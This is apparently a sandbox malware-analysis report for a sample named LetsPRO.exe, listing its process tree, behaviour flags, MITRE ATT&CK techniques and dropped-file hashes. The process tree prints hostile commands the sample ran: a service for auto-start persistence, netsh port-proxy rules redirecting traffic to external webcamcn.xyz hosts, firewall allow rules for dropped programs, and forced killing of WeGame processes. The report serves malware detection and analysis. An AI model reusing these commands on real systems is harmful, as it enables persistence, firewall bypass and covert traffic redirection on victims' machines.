C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:3996 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2436
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:3696 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1360
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:4092 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4672
-
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"2⤵
- Executes dropped EXE
PID:2004 -
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4524
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1120 -ip 11201⤵PID:4388
-
C:\Windows\system32\cscript.execscript C:\Users\Admin\30270\302701.vbs1⤵
- Modifies data under HKEY_USERS
PID:4360
-
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1788 -
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNzIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QjgyNTExMzUtNzk4Ri00MTM5LUFENDYtOUMyNjkzRTgxNjg1fSIgdXNlcmlkPSJ7RkQyQ0RFQUItODMyQS00NjJGLUIwMjMtNjQxRDExQTkzM0JDfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezZCNjA2NUQ2LUJFRTQtNDY1NS1CQzgxLUY3NEE3QkM0QTYzRH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iIiBhcD0ieDY0LXN0YWJsZS1zdGF0c2RlZl8xIiBsYW5nPSJ6aC1DTiIgYnJhbmQ9IiIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjciIGlpZD0iezg1MkQwNzVBLUNCOUQtNjM2MC00RTRELTQyN0JCQjRGMTFFMX0iPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDEyODg5IiBleHRyYWNvZGUxPSIyNjg0MzU0NTkiIHVwZGF0ZV9jaGVja190aW1lX21zPSI0ODU0NyIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe cscript C:\Users\Admin\30270\302701.vbs1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
C:\Windows\system32\sc.exesc create 302701973 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 3027019731⤵
- Launches sc.exe
PID:4856
-
C:\Windows\system32\netsh.exenetsh interface portproxy add v4tov4 listenport=443 connectaddress=156.248.54.11.webcamcn.xyz connectport=4431⤵PID:1892
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"1⤵
- Modifies Windows Firewall
PID:2124
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"1⤵
- Modifies Windows Firewall
PID:4556
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"1⤵
- Modifies Windows Firewall
PID:2068
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"1⤵
- Modifies Windows Firewall
PID:368
-
C:\Windows\system32\netsh.exenetsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=801⤵PID:3504
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im wegame.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im WeGame.exe1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3376
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
219KB
MD58b4edf1d5396545b129ddfdf947f694e
SHA11c5593fb591b170807abb84ae756c807210e06ba
SHA256a5bc174fa546734b660faf5f059cfbf1304ac40e2014734d3226755c1412e6ce
SHA5128f8f7da49d9dd6b47bec7c3bdf94d83f1fc7940a2b65b5e5f4697463cace3d3240d6b9eaa6e0c107a01e11a3c064f6c7a38211a4af3e5a93e9d7a1739504509f
-
Filesize
1.3MB
MD58884a9547aa410b697efad097f2b0013
SHA1f3e7b8a25df24532f48dae750388e1749169b620
SHA25624e46969cea3b387e899d5da33820b988a9944100e47aba3d1960c4080f28b9b
SHA512e03eb2eb3f8414b2c9aa9431b63082fb195ea499dc7c1ea9e67e649c81b5c13d922fda30c5b62ca15a9bccbc6d7f6efa4a92ef604216e80ef3ee14d10e38b1c4
-
Filesize
241KB
MD57bb188dfee179cbde884a0e7d127b074
SHA1af351d674ec8515b4363b279c5ef803f7a4a3618
SHA2567c3308f04df19ecaa36818c4a49348e1d6921a43df5c53cb8131cc58e92889ed
SHA51245df588d45cad6bce5dfb48626d7505140ec1c1beecb97e3f9393cb90a144ca09c1a4d4ded75fce18ac3c7dc6f5ca0b222574222bd746d60cb6068ef910a5c4b
-
Filesize
9.4MB
MD575d0239e2d42fcb09ad6dd6380e58441
SHA1d146d55d9e3cac254414c5d3dccd56e55c62f229
SHA256530a033f92543e1fe9061e5043f0eacbec5a0db300b862e8470fcd0c36fe07c1
SHA51218fe51d9f9ded140e9a12f1c20c8fa4fa049892c480dcf933a29b15f3e3f063be410245071da77cac34626fcbf60fe067f42d39eb4b03cffd2fb88413314e695
-
Filesize
7KB
MD5a5fc151170b4bef53a2918729aa6d3a9
SHA15c4aa81eabf2b681d950813efe91b4959def907f
SHA2567462f9337a959b4f57b58cb2002016dd1bbdbd6a9b7ba339c933a5b6c1bbc324
SHA51248face9b188040377787e0ff0e0725fed5cefee4aa5ce4b8ca89af40352fea559d446941858bb1a3db6cacf901cbcae62c8005ee616829974b6a7a9f01b8472b
-
Filesize
756KB
MD5ef3e115c225588a680acf365158b2f4a
SHA1ecda6d3b4642d2451817833b39248778e9c2cbb0
SHA25625d1cc5be93c7a0b58855ad1f4c9df3cfb9ec87e5dc13db85b147b1951ac6fa8
SHA512d51f51336b7a34eb6c8f429597c3d685eb53853ee5e9d4857c40fc7be6956f1b8363d8d34bebad15ccceae45a6eb69f105f2df6a672f15fb0e6f8d0bb1afb91a
-
Filesize
294KB
MD54c3832fbe84b8ce63d8e3ab7d76f9983
SHA1eea2d91b7d7d2cdf79bb9f354af7a33d6014f544
SHA2568fe2226e8bec5a45d4b819359192ab92446b54859bf8877573ab7a3c8b4ada76
SHA512e6e316bf3414ffb2674bf240760b2617ced755b8a34ad4b3213bcca6ea9a0aa3c2e094319d709a958f603b72197bfa34b100dbe87b618e17601b2e0dac749f84
-
Filesize
392KB
MD5dae993327723122c9288504a62e9f082
SHA1153427b6b0a5628360472f9ab0855a8a93855f57
SHA25638903dec79d41abda6fb7750b48a31ffca418b3eab19395a0a5d75d8a9204ee7
SHA512517fc9eaf5bf193e984eee4b739b62df280d39cd7b6749bec61d85087cc36bb942b1ebaed73e4a4a6e9fa3c85a162f7214d41ea25b862a4cf853e1129c10293d
-
Filesize
158KB
MD5baf0b64af9fceab44942506f3af21c87
SHA1e78fb7c2db9c1b1f9949f4fcd4b23596c1372e05
SHA256581edeca339bb8c5ebc1d0193ad77f5cafa329c5a9adf8f5299b1afabed6623b
SHA512ee590e4d5ccdd1ab6131e19806ffd0c12731dd12cf7bfb562dd8f5896d84a88eb7901c6196c85a0b7d60aee28f8cfbba62f8438d501eabd1bb01ec0b4f8d8004
-
Filesize
181KB
MD50fe3644c905d5547b3a855b2dc3db469
SHA180b38b7860a341f049f03bd5a61782ff7468eac7
SHA2567d5c0ed6617dbc1b78d2994a6e5bbda474b5f4814d4a34d41f844ce9a3a4eb66
SHA512e2cf9e61c290599f8f92214fae67cce23206a907c0ab27a25be5d70f05d610a326395900b8ed8ed54f9ecbddfd1b890f10280d00dbcdad72e0272d23f0db1e53
-
Filesize
217KB
MD5021c57c74de40f7c3b4fcf58a54d3649
SHA1ef363ab45b6fe3dd5b768655adc4188aadf6b6fd
SHA25604adf40ba58d0ab892091c188822191f2597bc47dab8b92423e8fc546dc437ef
SHA51277e3bbb08c661285a49a66e8090a54f535727731c44b7253ea09ffe9548bae9d120ef38a67dfa8a5d8da170dde3e9c1928b96c64dfc07b7f67f93b478937c018
-
Filesize
1.9MB
MD5dce0fd2b11b3e4c79a8f276a1633e9ae
SHA1568021b117ace23458f1a86cd195d68de7164fa9
SHA256c917ad2bf8c286ae0b4d3e9203ab3da641af4c8d332e507319ee4df914d6219c
SHA512ba89867fd2bea6166b6e27c2a03a9a4759aee1affe75d592f381d9cb42facba1af1535f009a26f2613338b50de13b6576ab23c4e24d90827739f1678923ff771
-
Filesize
42KB
MD546f8834dd275c0c165d4e57e0f074310
SHA17acbfb7e88e9e29e2dc45083f94a95a409f03109
SHA25691ac6c9686d339baa0056b1260f4fd1394ce965b1957aa485e83ae73492f46b5
SHA512b615fe41b226273693da423969a834b72c5148f5438e7a782d39191ad3013e2abfa10d651fa2ded878abb118e31831dc7dec51729b3235cebb2b5d7f3ba2ade1
-
Filesize
41KB
MD5d1c81b89825de4391f3039d8f9305097
SHA1ecfcf4b50dfbb460e1d107f9d21dd60030bf18c3
SHA256597fe53d87f8aa43b7e2deb4a729fc77131e4a2b79dc2686e8b86cc96989428e
SHA512a2be34c226c0a596efa78240984147196a4de8c93187af5835f0cec90ed89e7dffd7030cd27e7a1f1bd7f26d99322e785e195f5d41bf22e00c4af08270699642
-
Filesize
44KB
MD50d7125b1bda74781d8f1536e43eb0940
SHA139818cacce52ff2edfb2a065beb376d43fdb0a93
SHA25600dfe30f3e747b5788f7ae89b390e63760561a411b7e39257376cd13700a1e0b
SHA512c34d7405acceb7186cf63e75083981b9230d2755e207fdfd1dbce7d59a96f30ec04c28c12dbe0ed96fb595c63dec8819c08d406840787d9b9797568fbf50dec2
-
Filesize
44KB
MD564ed14e0070b720fcefe89e2ab323604
SHA1495c858c55151e2400a1a72023aa62216033f928
SHA256635f3a7fd3c1f62eb91117189ac84e1a1e5c3a8e104863d125c16e8be570e3d1
SHA5124fab73de11e595c7e4edd9a66137f8e7b0b13db1799dbe4c10dd766783079d38d560c6cc1bf9af4bc1abd71f1706643bd9a31c0f58e55df3d0dd7d739e1480b7
-
Filesize
44KB
MD5ba783ac59839551280618c83c760d583
SHA153d1d10955e322a6135b047eecd88a4815f9b6da
SHA256c2d15f8da32907d8cea1aaa0d51f16bc692a74141fdace43a84c78647433a086
SHA512a635d52c20164a02dc3fc4ddb961bf36177014e0cb27e50588013a0e9f3787194de3c9da160672b62b25eb94ddcea366bcaa44b6bfa593da77c97aba48f8a50b
-
Filesize
37KB
MD53238536195c72141bf60ee15ce6413dd
SHA15d89916a8f72b9836e3e2e1eb93077b515a231e9
SHA2565c0e33d4cbda0d878a48c51a7286e6ce3884ef0aa06ce4fc306b888d3e8f07f4
SHA51278fcc97db95b720e1ce7fa24ec9820d784a8013f791837629021176f8ae416775ed8a25b3afbce33fc18b29de5375f3ea2818a5a345ba0ad87bc71dfb72cbe0c
-
Filesize
215KB
MD5e7e51805794e1a71c5e2bdd45f4ee5c9
SHA1d178d4c1deb28018a180ac3a6182e923660e16f5
SHA256f6216d72f4d9a7d46f3b878650b2f26982e4f05b8b5ce363a60c564159db781f
SHA5125632ceae01b6aad3d806bcdf2bdaf40e487cb3dc48d83597429dc4e9c5867a878a87ca06c3a2e43e8fc532295b5b8efbb472bd07c33f6b6629e877e3392eb576
-
Filesize
408KB
MD50901970c2066aed8a97d75aaf1fd3146
SHA1f0c700a4bfcebad9843e01a88bab71b5f38996d8
SHA25641f827e6addfc71d68cd4758336edf602349fb1230256ec135121f95c670d773
SHA51200e12fd2d752a01dfa75550ffaf3a2f337171cec93cd013083c37137a455e93bebd72e7d8487ec3e1de5fe22994f058829a6597765612278c20d601192cbe733
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82